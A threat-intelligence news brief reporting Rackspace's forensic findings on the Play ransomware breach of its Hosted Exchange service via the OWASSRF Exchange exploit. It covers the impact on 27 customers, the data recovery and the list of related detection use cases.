Rackspace Confirms Data Impact from Play Ransomware Attack

Category: Data Breach | Industry: Technology | Level: Tactical | Source: Rackspace

Rackspace's forensic investigation into the security incident in their Hosted Exchange environment with CrowdStrike has been completed. The investigation identified the Play ransomware gang as the perpetrators behind the attack, with the ransomware operators exploiting the ProxyNotShell mitigations OWASSRF, which was recently reported by CrowdStrike. Using the OWASSRF exploit, the threat actors targeted CVE-2022-41080, a critical Microsoft Exchange vulnerability, to elevate their privileges and bypass ProxyNotShell URL rewrite mitigations. In addition, Play operators were able to conduct remote code execution by exploiting, CVE-2022-41082. Further post-exploitation activity from the investigation was not shared, however from CrowdStrike's original blog, the threat actors could have downloaded remote access tools such as AnyDesk and Plink using BitsAdmin and used Mimikatz for credential access following the exploitation of OWASSRF.

Rackspace confirms the Play ransomware operators had accessed customer email data, as of "the nearly 30,000 customers on the Hosted Exchange email environment at the time of the attack, the forensic investigation determined the threat actor accessed a Personal Storage Table ("PST") of 27 Hosted Exchange customers. We have already communicated our findings to these customers proactively, and importantly, according to CrowdStrike, there is no evidence that the threat actor actually viewed, obtained, misused, or disseminated emails or data in the PSTs for any of the 27 Hosted Exchange customers in any way." Rackspace has already contacted the impacted customers and with any customer not receiving communication from Rackspace "can be assured that their PST data was not accessed by the threat actor."

Rackspace is also progressing through the data recovery process of its hosted Microsoft Exchange data and is notifying customers if the recovery of their mailbox data exceeds 50%. The data recovery is only applicable to historical data prior to the date of the attack on December 2nd, 2022. Lastly, Rackspace announced "the Hosted Exchange email environment will not be rebuilt as a go-forward service offering," as the cloud computing company had planned prior to the security incident to migrate to Microsoft 365. Customers impacted by the attack already had been migrated to Microsoft 365 thus accelerating the organization's plans.

Anvilogic Scenario:

• BITSadmin Abuse for Host Compromise

Anvilogic Use Cases:

• ReverseShell Upgrade From WebShell
• Potential ProxyShell
• Mimikatz Execution

‍